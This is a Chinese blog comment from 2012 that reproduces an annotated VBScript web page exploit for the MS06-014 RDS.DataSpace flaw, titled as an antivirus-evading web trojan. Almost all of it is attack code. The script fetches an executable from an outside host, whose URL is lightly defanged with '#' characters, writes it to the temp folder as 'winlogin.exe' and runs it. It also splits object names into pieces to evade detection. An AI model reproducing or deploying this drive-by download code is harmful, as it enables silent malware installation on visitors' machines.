评论
# re: 一段植入木马的html代码
2012-06-25 14:47
往往v
< html >
< script language ="VBScript" >
on error resume next
' 即将下载的木马
dl = " ht#tp://ww#w.800vv.com/cc/cj.exe# "
' 创建OBJECT元素
Set df = document.createElement( " object " )
' 指定OBJECT为RDS.DataSpace
' 该对象有一个方法名为CreateObject,
' helpstring("Creates a business object of the specified Progid over the specified connection")
df.setAttribute " classid " , " clsid:BD96C556-65A3-11D#0-983A-00C04F#C29E36 "
'
str = " Microsoft.XMLHTTP "
' RDS.DataSpace.CreateObject("Microsoft.XMLHTTP","")
Set x = df.CreateObject(str, "" )
' 4545
a1 = " A#do "
a2 = " db. "
a3 = " Str "
a4 = " eam "
' str5 = "Adodb.Stream" 分成这么多段是为了掩人耳目
str1 = a1 & a2 & a3 & a4
str5 = str1
' RDS.DataSpace.CreateObject("Ado#db.Str#eam","")
set S = df.createobject(str5, "" )
' 5455
S.type = 1
str6 = " GET "
' Microsoft.XMLHTTP.Open "GET" "ht#tp://ww#w.800vv.com/cc/cj.exe#" False
' 下载木马
x.Open str6, dl, False
x.Send
' 本地文件名
fname1 = " winlogin.exe "
' 888
set F = df.createobject( " Scri#pting.FileSy#stemObject " , "" )
' 获取临时目录
set tmp = F.GetSpecialFolder( 2 )
' 创建本地文件
fname1 = F.BuildPath(tmp,fname1)
' Adodb.Stream.open
S.open
' Adodb.Stream.write 木马代码
S.write x.responseBody
' Adodb.Stream.savetofile "临时目录\winlogin.exe"
S.savetofile fname1, 2
' 6551
S.close
' 458
set Q = df.createobject( " Shell.Application " , "" )
' 运行 临时目录\winlogin.exe
Q.ShellExecute fname1, "" , ""
' 55
script >
< head >
< title > icexiaoyeMS06-014免杀网马 title >
head >< body >
< center > icexiaoyeMS06-014免杀网马 center >
body >
< script type ="text/jscript" >
function init() {
document.write(Date());
}
window.onload = init;
script >
html > 回复 更多评论